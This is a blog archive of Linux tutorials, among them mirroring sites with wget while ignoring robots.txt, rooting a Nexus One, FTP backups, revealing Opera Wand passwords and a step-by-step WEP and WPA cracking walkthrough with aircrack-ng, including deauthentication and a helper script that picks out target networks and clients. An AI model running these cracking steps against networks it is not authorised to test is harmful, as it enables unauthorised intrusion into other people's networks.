Category Archives: BackTrack

Offline Browsing in Linux: wget and some tricks

Ever since I joined Hostgator.com, I've been learning a lot of Linux in the hope of switching my career to Linux, ideally something forensics-related.

The latest problem I ran into was downloading a whole website for offline browsing. I went hunting for an offline browser for Linux and found that wget can mirror an entire site.

For example, to make a copy of blackberrysimunlockcode.com:

wget -m http://blackberrysimunlockcode.com

The -m option tells wget to mirror the site. That is the basic command, but what if you need more control?

I was trying to get all the script files off a website to save for later study, and all wget was downloading was index.html and robots.txt. The site's robots.txt was blocking the wget user agent. To confirm this I used wget's debug option:

wget -m -d http://blackberrysimunlockcode.com

You’ll get something like:

Not following http://blackberrysimunlockcode.com/privacy.shtml because robots.txt forbids it.

or

Rejecting path sh/eg/talk.sh.txt because of rule `sh’

or

no-follow in index.html

I tried the option --user-agent "Mozilla" ... no luck.

I tried adding the following to .wgetrc:

## Local settings (for a user to set in his $HOME/.wgetrc). It is
## *highly* undesirable to put these settings in the global file, since
## they are potentially dangerous to "normal" users.
##
## Even when setting up your own ~/.wgetrc, you should know what you
## are doing before doing so.
##

header = Accept-Language: en-us,en;q=0.5
header = Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
header = Accept-Encoding: gzip,deflate
header = Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
header = Keep-Alive: 300
user_agent = Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
referer = http://www.google.com

…Still no luck.

The trick is the option -e robots=off. wget's robot exclusion handling is separate from the User-Agent header: the rules above sat under User-agent: *, which applies to every client, so no user agent string can satisfy them. robots=off makes wget stop consulting robots.txt (and the robots meta tag) altogether.

So my new command became:

wget -m -k -e robots=off -w 2 --random-wait -U "Mozilla" -np http://blackberrysimunlockcode.com

Here's what the options do:

-m mirrors the site (shorthand for -r -N -l inf --no-remove-listing: recursive, timestamped, unlimited depth)
-k converts the links in the downloaded pages to point at the local copies, so clicking a link offline opens /sh/eg from your mirror instead of going back to www.blackberrysimunlockcode.com/sh/eg (relative vs absolute)
-e robots=off executes the .wgetrc command robots=off, i.e. ignore robots.txt and robots meta tags
-w 2 waits 2 seconds between requests so you don't overload the server and get your IP blocked
--random-wait varies that wait around the 2-second value so the requests don't arrive at a fixed interval
-U sets the user agent string
-np no parent: never ascend to the parent directory, so if a page under the start directory links to pages above it, wget does not end up crawling the whole site

Bear in mind that -e robots=off deliberately overrides what the site owner asked crawlers not to fetch. Keep the rate limiting in place, and use it only where you have a legitimate reason to archive the content.
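To see why the user-agent tricks could not work, here is a small robots.txt matcher that mirrors what wget's recursive mode checks before following a link. This is an added example written for this page, not code from the original post or from wget; the sample robots.txt is constructed (it is not the real file from blackberrysimunlockcode.com, only rules of the shape the debug output reported), and it simplifies the real rules: Allow: lines are not interpreted and a rule matches as a plain path prefix (no * or $ patterns).

```shell
#!/bin/sh
# robots_check.sh -- added example, not from the original post.
# robots_blocked <robots.txt> <user-agent string> <url path>
# exit 0 when the path is disallowed for that user agent, 1 when it is allowed
robots_blocked() {
    awk -v ua="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" -v path="$3" '
        { sub(/#.*/, ""); gsub(/^[ \t]+|[ \t]+$/, "") }   # strip comments and whitespace
        /^$/ { next }
        tolower($0) ~ /^user-agent:/ {
            agent = tolower($0); sub(/^user-agent:[ \t]*/, "", agent)
            if (!in_header) kind = ""        # a new group starts; forget the previous one
            in_header = 1
            if (agent == "*" && kind == "") kind = "star"
            # the agent token is a case-insensitive substring of the UA string
            if (agent != "*" && index(ua, agent) > 0) { kind = "specific"; seen_specific = 1 }
            next
        }
        { in_header = 0 }
        kind != "" && tolower($0) ~ /^disallow:/ {
            rule = $0; sub(/^[Dd]isallow:[ \t]*/, "", rule)
            if (rule != "" && index(path, rule) == 1) hit[kind] = 1
        }
        END {
            # the most specific group wins: a group naming this agent makes
            # the catch-all "*" group irrelevant, empty Disallow included
            if (seen_specific) exit (hit["specific"] ? 0 : 1)
            exit (hit["star"] ? 0 : 1)
        }' "$1"
}

# Constructed sample: rules of the kind wget -d reported, under "User-agent: *",
# plus a group that exempts one named crawler.
ROBOTS_SAMPLE=$(mktemp)
cat > "$ROBOTS_SAMPLE" <<'EOF'
# constructed sample, not the real site's file
User-agent: *
Disallow: /sh/
Disallow: /privacy.shtml

User-agent: Googlebot
Disallow:
EOF

# Try it with wget's default UA, with the -U "Mozilla" value, and with the
# exempted crawler; only the last one gets /sh/eg/talk.sh.txt:
#   robots_blocked "$ROBOTS_SAMPLE" "Wget/1.12" /sh/eg/talk.sh.txt
#   robots_blocked "$ROBOTS_SAMPLE" "Mozilla"   /sh/eg/talk.sh.txt
#   robots_blocked "$ROBOTS_SAMPLE" "Googlebot" /sh/eg/talk.sh.txt
```

The point the script makes is that the blocking group is User-agent: *, so swapping the user agent only changes which group wget looks at when a specifically named group exists; a catch-all rule set stays in force for every name you invent, and -e robots=off is the only wget switch that stops the check.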

Getting root on your new Nexus One Android Google Phone

The Nexus One was rooted before it was even released. Paul at the MoDaCo forums showed how; here is a simplified version of his method.

1. First unlock the bootloader. On a T-Mobile Nexus One this voids the warranty (and, as with any fastboot oem unlock, wipes the user data on the phone); alternatively buy the unlocked version from Google for about $550:

a. download fastboot (it ships with the Android SDK platform tools)
b. put the phone in bootloader mode (see step 2b), open a terminal or command prompt, confirm that fastboot devices lists the phone, and type
– Windows: fastboot-windows oem unlock
– Mac: ./fastboot-mac oem unlock
– Linux: ./fastboot-linux oem unlock

2. Boot a modified boot image (not the bootloader itself) to obtain root privileges:

a. Download either SuperBoot or InsecureBoot and extract it. (The difference: with InsecureBoot nothing on the system partition is changed, so you have to launch su manually each time.)
b. Put the device in bootloader mode: turn the phone off, then power it on while holding the trackball.
c. Run the installer script, which hands the modified boot image to the phone over fastboot:
– Windows = double click the windows bat file
– Mac = open terminal and cd to the directory containing the file. type
chmod +x install-superboot-mac.sh
./install-superboot-mac.sh

– Linux = open terminal and cd to the directory containing the file. type
chmod +x install-superboot-linux.sh
./install-superboot-linux.sh

Now you should have root! Check it: run adb shell, then su, then id, which should report uid=0(root).

(Image: rooted Nexus One Google Phone. Pic courtesy of Stericson.)

Automatic website backup without SSH enabled over FTP

Last time I backed up my website with rsync over SSH, but my new host has SSH disabled. rsync does not work over FTP, and I do not want incremental delta-file backups of the kind rdiff-backup or duplicity produce; I need an exact mirror of the site. Remember that SQL databases are not files under public_html, so this method does not back them up.

curlftpfs is the key! In this tutorial I show how to back up from one server to a backup location, which can be your hard drive, another web host, a Dropbox folder, Box.net via WebDAV, etc.

Install curlftpfs, rsync and ncftp:
sudo apt-get install curlftpfs ncftp rsync

Make directories on which to mount the FTP servers:
sudo mkdir /media/hydtechblog
sudo mkdir /media/hydtechbackupserver

Edit fstab to mount the FTP servers using curlftpfs:
sudo gedit /etc/fstab

Add these lines, adjusted for your servers:
curlftpfs#username:password@hydtechblog.com /media/hydtechblog fuse rw,noauto,allow_other,uid=root 0 0
curlftpfs#username:password@hydtechbackupserver /media/hydtechbackupserver fuse rw,noauto,allow_other,uid=root 0 0

Two things to be aware of here. The FTP password sits in /etc/fstab, which is world-readable, so every local user on the backup machine can read it; give that account only the access the backup needs. Plain FTP also sends the password and all the data in cleartext, so if the host offers FTPS add ssl to the options (curlftpfs's -o ssl). allow_other additionally requires user_allow_other to be enabled in /etc/fuse.conf.

noauto is there because these two will not mount at boot anyway: fstab is processed before the network is up, and a mount that is attempted then simply fails. Instead we mount them from cron.

Edit root's crontab:
sudo crontab -e
Enter the following lines, adjusted to your paths (the mount points must be the same ones named in fstab):
00 09 * * * mount /media/hydtechblog
00 09 * * * mount /media/hydtechbackupserver
01 09 * * * rsync -a --delete /media/hydtechblog/public_html/ /media/hydtechbackupserver/public_html/

--delete removes from the backup anything that has disappeared from the site, which is what an exact mirror means; the trailing slashes copy the contents of public_html into the target public_html rather than nesting a second public_html inside it. Both ends are local FUSE mounts, so rsync's -z compression and --rsync-path do nothing useful here.

In nano, Ctrl+O writes the file and Ctrl+X exits.

This tells cron to mount the folders at 9:00 am and start rsync at 9:01 am. If a mount fails, rsync will happily copy to or from the empty mount point, so check the backup occasionally. You can replace the backup location with another folder on your hard drive, or your Dropbox or Ubuntu One folder; you can also mount Box.net with WebDAV and use the same method.
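The three separate cron entries above assume both mounts succeeded by 9:01. The script below is an added example (not from the original post) that folds them into one job which refuses to sync when either side is not actually mounted; the mount points are the post's, and the script path in the suggested crontab line is an assumption.

```shell
#!/bin/sh
# ftp_mirror_backup.sh -- added example, not from the original post.
SRC_MNT=/media/hydtechblog
DST_MNT=/media/hydtechbackupserver

# is_mounted <dir>: 0 when the kernel's mount table lists <dir> as a mount
# point. Without this check a failed mount leaves an empty directory and
# rsync --delete would faithfully "mirror" that emptiness into the backup.
is_mounted() {
    awk -v d="$1" '$2 == d { found = 1 } END { exit !found }' /proc/mounts
}

# ensure_mounted <dir>: mount via its /etc/fstab entry unless already mounted
ensure_mounted() {
    is_mounted "$1" || mount "$1"
    is_mounted "$1"
}

# mirror_tree <src> <dst>: exact copy. --delete removes files that vanished
# on the live site; the trailing slashes copy the contents of <src> into
# <dst> rather than nesting a second public_html inside it. No -z and no
# --rsync-path: both sides are local FUSE mounts, not a remote rsync.
mirror_tree() {
    rsync -a --delete "$1/" "$2/"
}

# backup_site <src mount> <dst mount>: mount, verify, sync, unmount
backup_site() {
    src="$1"; dst="$2"
    ensure_mounted "$src" || { echo "$src is not mounted, aborting" >&2; return 1; }
    ensure_mounted "$dst" || { echo "$dst is not mounted, aborting" >&2; return 1; }
    mirror_tree "$src/public_html" "$dst/public_html"
    rc=$?
    umount "$src"
    umount "$dst"
    return "$rc"
}

# Run only when invoked with --run, so sourcing the file just defines the
# functions. Suggested crontab line (one job, so the order is guaranteed):
#   00 09 * * * /usr/local/sbin/ftp_mirror_backup.sh --run
if [ "${1:-}" = "--run" ]; then
    backup_site "$SRC_MNT" "$DST_MNT"
fi
```

Unmounting after the sync also means the FTP credentials are only in use for the minutes the backup takes, rather than leaving a writable mount of the live site sitting on the backup machine all day.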

For encrypted incremental backups checkout duplicity, it also works with webdav and ftp.

Revealing Opera wand passwords on Ubuntu Linux and OS X

There are several Windows utilities that reveal Opera Wand passwords, but I haven't used Windows in ages. The Opera wiki hosts a Power Button that captures your password as you log in to a site. Click the link in Opera and it installs a button you can drag to any panel. On a page that requires a password, click this new button instead of your usual Wand button and the stored password is shown rather than filled in silently.

The flip side is that anything able to drive Opera inside your session can pull Wand passwords the same way, so set a master password for Wand if you keep anything sensitive in it.

Voila!

How to make the Broadcom 4312 Wireless driver work in BackTrack 4 on the Lenovo S10

This guide is adapted from Kazalku's guide on the Remote Exploit forums. Thanks Kazalku.

Download the driver tarball (Broadcom's hybrid wl driver, hybrid-portsrc-x86_32-v5_10_91_9-3.tar.gz) and get it onto the BackTrack machine, by USB stick or by booting another OS on a multiboot system, saving it in root's home directory.

Untar it:

tar -xvzf hybrid-portsrc-x86_32-v5_10_91_9-3.tar.gz

Build the module against the running kernel (this needs the kernel headers, i.e. /lib/modules/`uname -r`/build must exist):
make -C /lib/modules/`uname -r`/build M=`pwd`

Load the modules (wl needs ieee80211_crypt_tkip loaded first):
modprobe ieee80211_crypt_tkip
insmod wl.ko

The wireless interface should now be claimed by the driver. Check with the command below: the network entry should no longer be listed as UNCLAIMED and its configuration line should show driver=wl:
lshw -C network

Bring it up:
ifconfig eth1 up

To have modprobe find the module on boot, install it into the module tree:

cp wl.ko /lib/modules/`uname -r`/kernel/net/wireless
depmod -a
modprobe wl

Load the modules at every startup:
kate /etc/modules

add the following and close the text editor:
ieee80211_crypt_tkip
wl

Load NetworkManager and configure KNetworkManager:
Type NetworkManager in a Konsole and configure the wireless from the tray icon at the bottom right.

Delete the build files from root's home directory now that you don't need them.
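The same steps as a script, with the checks the manual sequence skips: that the kernel headers are present before make runs, that the downloaded tarball (an out-of-tree binary blob) matches the checksum Broadcom publishes, and that wl is really loaded before anything is written to /etc/modules. This is an added example, not the post's or Kazalku's code; the tarball name is the one from the post, the expected SHA-256 is something you must copy from Broadcom's download page (assumed available), and eth1 is the interface name the post's BT4 system assigned.

```shell
#!/bin/sh
# install_wl.sh -- added example, not from the original post.
set -u

TARBALL=hybrid-portsrc-x86_32-v5_10_91_9-3.tar.gz
KVER=$(uname -r)
MODDIR=/lib/modules/$KVER
IFACE=eth1

# verify_tarball <file> <expected sha256 hex>: refuse to build a vendor blob
# whose checksum does not match what the vendor published.
verify_tarball() {
    actual=$(sha256sum "$1" | awk '{ print $1 }') || return 1
    [ "$actual" = "$2" ]
}

# module_loaded <name>: 0 when the module is in the kernel's module table
module_loaded() {
    awk -v m="$1" '$1 == m { found = 1 } END { exit !found }' /proc/modules
}

# make needs headers matching the running kernel; without them it fails late
# with a confusing error, so check up front.
require_headers() {
    [ -d "$MODDIR/build" ] || { echo "no kernel headers for $KVER in $MODDIR/build" >&2; return 1; }
}

# build_module <expected sha256>: unpack and compile, producing wl.ko
build_module() {
    require_headers || return 1
    verify_tarball "$TARBALL" "$1" || { echo "checksum mismatch on $TARBALL, not building" >&2; return 1; }
    tar -xzf "$TARBALL"
    make -C "$MODDIR/build" M="$(pwd)" || return 1
    [ -f wl.ko ]
}

# install_module: copy into the module tree, load, persist, bring the link up
install_module() {
    modprobe ieee80211_crypt_tkip || return 1      # wl needs it loaded first
    install -m 644 wl.ko "$MODDIR/kernel/net/wireless/" || return 1
    depmod -a
    modprobe wl || return 1
    module_loaded wl || { echo "wl did not stay loaded (check dmesg)" >&2; return 1; }
    # persist across reboots; the grep keeps re-runs from duplicating lines
    for m in ieee80211_crypt_tkip wl; do
        grep -qx "$m" /etc/modules || echo "$m" >> /etc/modules
    done
    ifconfig "$IFACE" up
}

# Usage, as root in the directory holding the tarball:
#   build_module <sha256 from Broadcom's download page> && install_module
```

Checking the tarball's hash is the one step that matters beyond convenience: a kernel module runs with full kernel privileges, so a tampered download gives an attacker ring 0 on the pentest laptop itself.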

Cracking WEP & WPA with IBM Lenovo X60 – Basics

Injection with the Intel PRO/Wireless cards was impossible at first. Then came the ipwraw driver. Now ipwraw is no longer needed, because the stock iwl3945 driver supports injection, and most Linux distributions ship it.

Follow these steps for a successful WEP crack in Ubuntu (only against a network you own or are authorised to test; the BSSIDs and client MACs below are placeholders to replace with your own):

install the necessary packages
sudo apt-get install aircrack-ng

put the card in monitor mode (this creates the mon0 interface used below)
sudo airmon-ng start wlan0

test injection
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80 mon0
(0% means injection is not working)

capture data on the AP's channel and write it to files named output*
sudo airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output mon0

fake authentication (-h is your own card's MAC)
sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

ARP request replay, to make the AP generate IVs quickly
sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

run aircrack (-z selects the PTW attack, which needs far fewer IVs)
sudo aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap

For WPA cracking:

monitor mode
sudo airmon-ng start wlan0

collect the handshake
sudo airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk mon0

deauth a connected client so it reconnects and you capture the 4-way handshake
sudo aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

crack the handshake against a wordlist
sudo aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

These are just refreshers. For more help check www.aircrack-ng.org
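Every command above needs values that come from airodump-ng's own output: the channel for -c, the BSSID for --bssid/-a/-b, and an associated station MAC for the deauth -c. airodump-ng -w psk also writes psk-01.csv, and the functions below pull those values out of it. This is an added example, not part of the original post or of aircrack-ng; the CSV sample is constructed with the post's placeholder addresses, and the column layout is the one airodump-ng uses (an AP table, a blank line, then a station table).

```shell
#!/bin/sh
# airodump_pick.sh -- added example, not from the original post.

# ap_lookup <csv> <essid>  -> prints "BSSID channel privacy" for that network
ap_lookup() {
    awk -F', *' -v essid="$2" '
        /^BSSID,/ { section = "ap"; next }             # AP table header
        /^Station MAC,/ { section = "sta"; next }      # station table header
        section == "ap" && NF >= 14 && $14 == essid {
            priv = $6; gsub(/ +$/, "", priv)           # airodump pads "WEP "
            print $1, $4, priv; exit
        }' "$1"
}

# ap_clients <csv> <bssid> -> one associated station MAC per line
# (stations that only probed show "(not associated)" and are skipped, since
# deauthing them yields no handshake)
ap_clients() {
    awk -F', *' -v bssid="$2" '
        /^Station MAC,/ { section = "sta"; next }
        section == "sta" && NF >= 6 && $6 == bssid { print $1 }' "$1"
}

# Constructed sample of what "airodump-ng -w psk" leaves in psk-01.csv.
AIRODUMP_SAMPLE=$(mktemp)
cat > "$AIRODUMP_SAMPLE" <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:14:6C:7E:40:80, 2009-07-04 10:00:00, 2009-07-04 10:05:00,  9,  54, WEP , WEP, OPN,  -45,      120,     3000,   0.  0.  0.  0,   7, linksys, 
00:1A:2B:3C:4D:5E, 2009-07-04 10:00:01, 2009-07-04 10:05:00,  6,  54, WPA2, CCMP, PSK,  -70,       80,        0,   0.  0.  0.  0,   5, other, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:0F:B5:FD:FB:C2, 2009-07-04 10:00:10, 2009-07-04 10:04:59,  -50,      400, 00:14:6C:7E:40:80, linksys
00:0F:B5:88:AC:82, 2009-07-04 10:01:00, 2009-07-04 10:04:00,  -60,       10, (not associated) , linksys
EOF

# Feed the results into the aireplay-ng deauth from the post:
#   set -- $(ap_lookup "$AIRODUMP_SAMPLE" linksys)   # $1=BSSID $2=channel $3=privacy
#   client=$(ap_clients "$AIRODUMP_SAMPLE" "$1" | head -n 1)
#   echo "sudo aireplay-ng -0 1 -a $1 -c $client mon0"
```

Reading the privacy column first also saves wasted effort: the -3 ARP replay and -z PTW steps are WEP-only, so a network that reports WPA or WPA2 goes straight to the handshake-capture sequence.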

Freenx nx server problem in Ubuntu Jaunty 9.04

After upgrading to Jaunty I could never connect to my desktop using NX. I use a Windows computer with the NoMachine NX client, and always got an error like this:

Info: Proxy running in client mode with pid '1728'
Session: Starting session at 'Sat Jan 12 16:34:05 2008'.
Warning: Connected to remote version 3.0.0 with local version 3.1.0
Info: Connection with remote proxy completed.
Warning: Unrecognized session type 'unix-desktop'. Assuming agent session.
Info: Using ADSL link parameters 512/24/1/0.
Info: Using cache parameters 4/4096KB/16384KB/16384KB.
Info: Using pack method 'adaptive-7' with session 'unix-gnome'.
Info: Using ZLIB data compression 1/1/32.
Info: Using ZLIB stream compression 4/4.
Info: No suitable cache file found.
Info: Forwarding X11 connections to display ':0'.
Info: Forwarding multimedia connections to port '6000'.
Info: Listening to font server connections on port '11000'.
Session: Session started at 'Sat Jan 12 16:58:19 2008'.
Info: Established X server connection.
Info: Using shared memory parameters 0/0K.
Session: Terminating session at 'Sat Jan 12 16:58:19 2008'.
Session: Session terminated at 'Sat Jan 12 16:58:19 2008'.

After hours of searching the web, I concluded the problem is with the ownership and permissions of the .Xauthority file. Here's how I fixed it:
sudo chown hydtech /home/hydtech/.Xauthority
sudo chgrp hydtech /home/hydtech/.Xauthority

and delete the stale xauth lock files (xauth creates .Xauthority-c and .Xauthority-l while it updates .Xauthority and leaves them behind if it is interrupted; while they exist every later xauth call fails on the lock, which would explain a session terminating right after the X server connection is established):
sudo rm /home/hydtech/.Xauthority-l
sudo rm /home/hydtech/.Xauthority-c

Now it works like a charm.
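The same repair as a script that checks before it changes anything, so it can be run every time the problem reappears without blindly chowning files. This is an added example, not from the original post; the user name and home directory are arguments, and hydtech in the usage comment is just the post's example.

```shell
#!/bin/sh
# fix_xauthority.sh -- added example, not from the original post.

# owned_by <file> <user>: 0 when the file exists and is owned by that user
owned_by() {
    [ -e "$1" ] && [ "$(stat -c '%U' "$1")" = "$2" ]
}

# clear_xauth_locks <home>: remove xauth's lock files and print how many
# were removed. xauth creates <file>-c and <file>-l while updating
# .Xauthority; if it is killed mid-way they stay behind, and every later
# xauth call (including the NX agent's) fails on the stale lock.
clear_xauth_locks() {
    removed=0
    for f in "$1/.Xauthority-c" "$1/.Xauthority-l"; do
        if [ -e "$f" ]; then
            rm -f "$f" && removed=$((removed + 1))
        fi
    done
    echo "$removed"
}

# repair_xauthority <user> <home>: fix ownership only if it is wrong (run as
# root for that), then clear the locks.
repair_xauthority() {
    user="$1"; home="$2"
    if ! owned_by "$home/.Xauthority" "$user"; then
        echo "fixing ownership of $home/.Xauthority" >&2
        chown "$user:$user" "$home/.Xauthority" || return 1
    fi
    n=$(clear_xauth_locks "$home")
    echo "removed $n stale lock file(s)" >&2
}

# Usage (as root):  . ./fix_xauthority.sh; repair_xauthority hydtech /home/hydtech
```

If the ownership is wrong again after the next login, something in the login path (a display manager or an NX wrapper running as root) is writing the file as the wrong user, and that is the thing to fix rather than re-running the chown.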

How to Install packages with slapt-get or gslapt in BackTrack 3

Once BackTrack is installed on the hard drive, open the menu, go to K -> BackTrack -> Penetration -> Fast Track and type:
./fast-track.py -i

Enter the Fast-Track updates menu (1) and update everything (9).

After the update finishes, select the Installation menu (8) and install everything (8).
Go back to the Installation menu, select Install Slapt-Get (1), then Install Slapt-Get (2), then Update SlackWare (1).
Exit (10).

Now you can use slapt-get to install packages from the Slackware repositories. For example, to install mozilla-thunderbird, first make sure it exists in the repositories:
slapt-get --search thunderbird
If it is there, install it with the --install parameter, using the full package name the search printed:
slapt-get --install mozilla-thunderbird-2.0.0.21-i686-1


You can also use gslapt, the GUI front-end for slapt-get, but it is broken by default in BT3, so reinstall it:
slapt-get --install --reinstall gslapt